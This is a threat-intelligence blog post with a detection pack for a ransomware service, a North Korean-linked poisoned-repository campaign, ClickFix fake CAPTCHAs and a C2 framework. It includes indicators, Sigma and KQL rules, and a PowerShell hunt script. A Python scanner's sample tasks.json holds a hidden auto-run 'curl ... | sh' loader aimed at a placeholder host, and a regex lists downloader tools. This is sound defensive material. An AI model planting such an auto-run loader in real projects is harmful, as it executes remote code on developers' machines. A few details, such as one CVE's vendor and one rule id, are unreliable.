
Void Dokkaebi Supply Chain & The Gentlemen RaaS: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
April 21, 2026

Recent OTX pulses indicate a convergence of high-activity threats focusing on initial access via software supply chains and credential theft to facilitate ransomware deployment. Key developments include:

  • The Gentlemen RaaS: This group is actively exploiting CVE-2024-37085 (VMware ESXi) and critical FortiOS vulnerabilities (CVE-2024-55591, CVE-2025-32463) to gain initial access. Their TTPs involve maintaining a database of compromised devices and utilizing sophisticated defense evasion to deploy payloads like LockBit 5.0, Medusa, and Babuk.
  • Void Dokkaebi (WageMole): A North Korean-aligned group has evolved into a self-propagating supply chain threat. They use fake job interviews to lure developers into cloning malicious repositories. The attack chain includes poisoned Git history and malicious VS Code task configurations (tasks.) that execute malware (DEV#POPPER RAT, InvisibleFerret) automatically upon opening the project.
  • ClickFix Campaign: A surge in "Fake CAPTCHA" social engineering attacks targets macOS and Windows users. Victims are tricked into running PowerShell or AppleScript commands, leading to the deployment of infostealers that harvest credentials from 12+ browsers and 16+ crypto wallets.
  • StepDrainer & AdaptixC2: While StepDrainer continues to target crypto assets via phishing domains, the AdaptixC2 framework is being adopted by APT groups for post-exploitation, utilizing Beacon Object Files (BOFs) and encrypted C2 channels over DNS/SMB.

The collective objective is clear: steal credentials (corporate and crypto) to facilitate lateral movement and data exfiltration prior to ransomware execution.


Threat Actor / Malware Profile

The Gentlemen (RaaS)

  • Distribution: Exploitation of public-facing applications (FortiOS, FortiProxy, VMware ESXi).
  • Payload: Multi-ransomware deployment (LockBit 5.0, Qilin, Vasa Locker).
  • Behavior: Exploits CVE-2024-37085 to execute commands on ESXi hypervisors; uses custom tools for defense evasion and data exfiltration.

Void Dokkaebi (WageMole)

  • Distribution: Supply chain attack via poisoned Git repositories; LinkedIn/social engineering fake job offers.
  • Payload: DEV#POPPER RAT, InvisibleFerret, BeaverTail.
  • Behavior: Abuses VS Code workspace trust to execute malicious tasks. Utilizes "worm propagation" to infect other repositories on the developer's machine.
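Added example (not code from the original post or from any report it cites): a pre-open check a developer or a CI job can run over a freshly cloned repository before it is opened in VS Code. It parses every .vscode/tasks.json in the checkout and flags tasks whose runOptions.runOn is "folderOpen", which VS Code executes as soon as the folder is opened in a trusted workspace. The sample tasks.json, the DOWNLOADER heuristic and the file layout are constructed assumptions.

```python
import json
import os
import re

# Download-and-run verbs typical of a loader; tune for your environment (assumption).
DOWNLOADER = re.compile(r"(curl|wget|Invoke-WebRequest|\biex\b|base64|powershell|osascript)", re.I)

def _strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: remove comments and trailing commas before parsing."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)

def find_autorun_tasks(tasks_json_text: str) -> list:
    """Return tasks with runOptions.runOn == 'folderOpen'; VS Code runs these on folder open."""
    hits = []
    for task in json.loads(_strip_jsonc(tasks_json_text)).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        hits.append({"label": task.get("label"), "command": cmd,
                     "hidden": bool(task.get("hide")),        # hidden from the Run Task picker
                     "downloader": bool(DOWNLOADER.search(cmd))})
    return hits

def scan_repo(path: str) -> list:
    """Walk a checkout and collect auto-run tasks from every .vscode/tasks.json, nested included."""
    out = []
    for root, _dirs, files in os.walk(path):
        if os.path.basename(root) == ".vscode" and "tasks.json" in files:
            full = os.path.join(root, "tasks.json")
            with open(full, encoding="utf-8") as fh:
                out += [dict(h, file=full) for h in find_autorun_tasks(fh.read())]
    return out

# Constructed sample tasks.json: one ordinary build task and one hidden auto-run loader.
SAMPLE = """{
  // comments and trailing commas are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "hide": true,
     "command": "curl -s https://example.invalid/s.sh | sh",
     "runOptions": {"runOn": "folderOpen"},},
  ]
}"""
```

Run scan_repo() on the clone path before opening it; a non-empty result means review the task, not open the folder.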

ClickFix (macOS/Windows Infostealer)

  • Distribution: Fake browser CAPTCHA pages leading to clipboard hijacking and script execution.
  • Payload: AppleScript (macOS) / PowerShell (Windows) based infostealers.
  • Behavior: Harvests keychain databases, browser cookies/credentials, and cryptocurrency wallet seed phrases.

AdaptixC2 Framework

  • Type: Post-exploitation C2 framework.
  • Behavior: Written in Go/C++; supports BOFs, process injection (T1055), and RC4 encrypted communication over HTTP, DNS, and SMB.

IOC Analysis

The provided pulses offer a mix of network and file-based indicators critical for defense:

  • Network Infrastructure (Void Dokkaebi/ClickFix/StepDrainer):

    • Void Dokkaebi C2: 166.88.4.2, 85.239.62.36, 23.27.20.143, 154.91.0.196.
    • ClickFix Infrastructure: 172.94.9.250 (Voxility LLP), bull-run.fun, spot-wave.fun.
    • StepDrainer Phishing: moonscan.live, scanclaw.live, aodefevrgdkhqltdnwgzbyjoywrlbntbhfwq.com.
    • Action: Block these IPs and domains at the perimeter and on endpoint firewalls. Investigate any historical egress connections to these IPs.
  • File Hashes (The Gentlemen/AdaptixC2):

    • The Gentlemen: 3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235 (SHA256).
    • AdaptixC2 Agent: f212fd00d9ffc0f3d868845f7f4215cb (MD5).
    • ClickFix: e12285f507c847b986233991b86b22e3 (MD5).
    • Action: Scan endpoints for these hashes. Use EDR "Isolation" capabilities if found.

Detection Engineering

Sigma Rules

YAML
title: Potential Void Dokkaebi VS Code Exploitation
id: 6b7d3a1c-8f4e-4b2a-9c5d-1a2b3c4d5e6f
description: Detects suspicious processes spawned by VS Code (Code.exe) potentially indicating malicious task execution from poisoned repositories.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6b7d3a1c8f4e4b2a9c5d1a2b3c4d5e6f/
tags:
    - attack.execution
    - attack.t1059.001
    - attack.initial_access
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\Code.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\pwsh.exe'
            - '\bash.exe'
            - '\node.exe'
    condition: selection
falsepositives:
    - Legitimate developer scripts execution
level: high
---
title: macOS ClickFix AppleScript Execution
id: 7c8e4b2d-9f5e-5c3b-0d6e-2b3c4d5e6f7a
description: Detects execution of osascript triggered by common browsers, consistent with ClickFix social engineering campaigns.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/7c8e4b2d9f5e5c3b0d6e2b3c4d5e6f7a/
tags:
    - attack.execution
    - attack.t1059.002
    - attack.t1204
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        ParentImage|contains:
            - '/Google Chrome.app'
            - '/Firefox.app'
            - '/Safari.app'
            - '/Microsoft Edge.app'
        Image|endswith: '/osascript'
    condition: selection
falsepositives:
    - Legitimate automation extensions
level: critical
---
title: AdaptixC2 MgBot Process Injection
id: 8d9f5c3e-0g6f-6d4c-1e7f-3c4d5e6f7a8b
description: Detects potential AdaptixC2 or MgBot behavior characterized by suspicious remote thread creation often used in post-exploitation frameworks.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/8d9f5c3e0g6f6d4c1e7f3c4d5e6f7a8b/
tags:
    - attack.defense_evasion
    - attack.t1055.002
    - attack.privilege_escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'CreateRemoteThread'
            - 'NtCreateThreadEx'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\rundll32.exe'
    filter_legit:
        ParentImage|contains:
            - '\Program Files\'
            - '\System32\'
    condition: selection and not filter_legit
falsepositives:
    - Unknown
level: high
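Added example (not from the original post): a minimal Python matcher that runs the two Windows Sigma selections above against constructed process-creation events, so the filter_legit exclusion in the third rule can be unit-tested before the rule ships. It implements only the endswith/contains modifiers and the "selection and not filter" condition shape used here; the rule dictionaries are transcribed from the rules above, the events are constructed, and this is not a Sigma engine.

```python
# Sigma string matching is case-insensitive; list values are OR-ed and the
# fields inside one selection/filter block are AND-ed.
def _field_match(event: dict, key: str, expected) -> bool:
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    values = expected if isinstance(expected, list) else [expected]
    ops = {"": lambda a, v: a == v, "endswith": lambda a, v: a.endswith(v),
           "contains": lambda a, v: v in a, "startswith": lambda a, v: a.startswith(v)}
    return any(ops[modifier](actual, str(v).lower()) for v in values)

def _block_match(event: dict, block: dict) -> bool:
    return all(_field_match(event, k, v) for k, v in block.items())

def sigma_hit(event: dict, detection: dict) -> bool:
    """Evaluate conditions of the form 'sel' or 'sel and not f1 and not f2'."""
    parts = [p.strip() for p in detection["condition"].split(" and not ")]
    if not _block_match(event, detection[parts[0]]):
        return False
    return not any(_block_match(event, detection[f]) for f in parts[1:])

VSCODE_RULE = {"selection": {"ParentImage|endswith": "\\Code.exe",
                             "Image|endswith": ["\\powershell.exe", "\\cmd.exe", "\\pwsh.exe", "\\bash.exe", "\\node.exe"]},
               "condition": "selection"}
INJECT_RULE = {"selection": {"CommandLine|contains": ["CreateRemoteThread", "NtCreateThreadEx"],
                             "Image|endswith": ["\\powershell.exe", "\\cmd.exe", "\\rundll32.exe"]},
               "filter_legit": {"ParentImage|contains": ["\\Program Files\\", "\\System32\\"]},
               "condition": "selection and not filter_legit"}

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c npm run build"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
    {"ParentImage": r"C:\Users\dev\Downloads\stage.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32 loader.dll,NtCreateThreadEx"},
    {"ParentImage": r"C:\Program Files\Vendor\agent.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32 helper.dll,CreateRemoteThread"},
]

def evaluate(events=EVENTS) -> list:
    """Return (event index, rule name) pairs that fire; event 3 is suppressed by filter_legit."""
    rules = {"vscode_child": VSCODE_RULE, "remote_thread": INJECT_RULE}
    return [(i, name) for i, ev in enumerate(events) for name, r in rules.items() if sigma_hit(ev, r)]
```

The third rule keys on API names appearing in a command line, which only catches scripts that spell the API out; the stronger source for remote-thread injection is the endpoint's own telemetry, for example Sysmon Event ID 8 (CreateRemoteThread detected).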

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Void Dokkaebi and ClickFix Network Indicators
let VoidIPs = pack_array("166.88.4.2", "85.239.62.36", "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196", "198.105.127.210", "83.168.68.219", "172.94.9.250");
let MaliciousDomains = pack_array("bull-run.fun", "spot-wave.fun", "moonscan.live", "scanclaw.live", "aodefevrgdkhqltdnwgzbyjoywrlbntbhfwq.com", "aahdjjsivunugynqjvyfbhqnjekniyfboma.com");
DeviceNetworkEvents
| where RemoteIP in (VoidIPs) or RemoteUrl has_any (MaliciousDomains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
    IOC Hunt Script for The Gentlemen, Void Dokkaebi, and AdaptixC2
    Checks for file presence and active network connections to known C2 infrastructure.
    Run from an elevated prompt so protected directories can be read.
    The indicators mix SHA256 (64 hex chars) and MD5 (32 hex chars), so each file is
    hashed once with each algorithm and compared against the matching list.
#>

$TargetSha256 = @(
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235", # The Gentlemen
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2"  # The Gentlemen
)

$TargetMd5 = @(
    "e12285f507c847b986233991b86b22e3", # ClickFix
    "f212fd00d9ffc0f3d868845f7f4215cb"  # AdaptixC2
)

$TargetIPs = @(
    "166.88.4.2", "85.239.62.36", "23.27.20.143", "154.91.0.196", "172.94.9.250"
)

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "Hashing files under $Drive" -ForegroundColor Yellow
    # One pass per drive rather than one pass per hash; -File skips directories, -Force includes hidden files
    Get-ChildItem -Path $Drive -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -gt 0 } |
        ForEach-Object {
            try {
                # String comparison with -in is case-insensitive, so Get-FileHash's upper-case hex matches as-is
                $Md5 = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction Stop).Hash
                if ($Md5 -in $TargetMd5) {
                    Write-Host "[!] MALICIOUS FILE FOUND (MD5 $Md5): $($_.FullName)" -ForegroundColor Red
                }
                $Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                if ($Sha256 -in $TargetSha256) {
                    Write-Host "[!] MALICIOUS FILE FOUND (SHA256 $Sha256): $($_.FullName)" -ForegroundColor Red
                }
            } catch {
                # Locked or inaccessible file (pagefile, in-use logs, etc.); skip it
            }
        }
}

Write-Host "[+] Checking active network connections for C2 IPs..." -ForegroundColor Cyan
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($IP in $TargetIPs) {
    $Hits = $Connections | Where-Object { $_.RemoteAddress -eq $IP }
    if ($Hits) {
        Write-Host "[!] SUSPICIOUS CONNECTION FOUND to $IP" -ForegroundColor Red
        # Resolve the owning process name so the analyst can triage without a second lookup
        $Hits | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess,
            @{ Name = 'ProcessName'; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } } |
            Format-Table -AutoSize
    }
}
Write-Host "Scan Complete." -ForegroundColor Green


---

Response Priorities

  • Immediate:

    • Block all listed Void Dokkaebi IPs and ClickFix/StepDrainer domains at the firewall and proxy.
    • Hunt for the listed file hashes on all endpoints; isolate any positive hits.
    • Identify systems running FortiOS and patch CVE-2024-55591 and CVE-2025-32463 immediately.
  • 24 Hours:

    • Initiate credential resets and forced MFA re-enrollment for developer accounts that may have interacted with external Git repositories or "job interview" links.
    • Review VS Code installation logs and workspace trust settings for developer workstations.
  • 1 Week:

    • Implement strict "allow-list" policies for Git repository cloning and VS Code extensions.
    • Conduct security awareness training focused on "Fake Job Offer" social engineering and "Fake CAPTCHA" browser pop-ups.
    • Segment ESXi management interfaces and hypervisor networks to mitigate The Gentlemen's lateral movement TTPs.
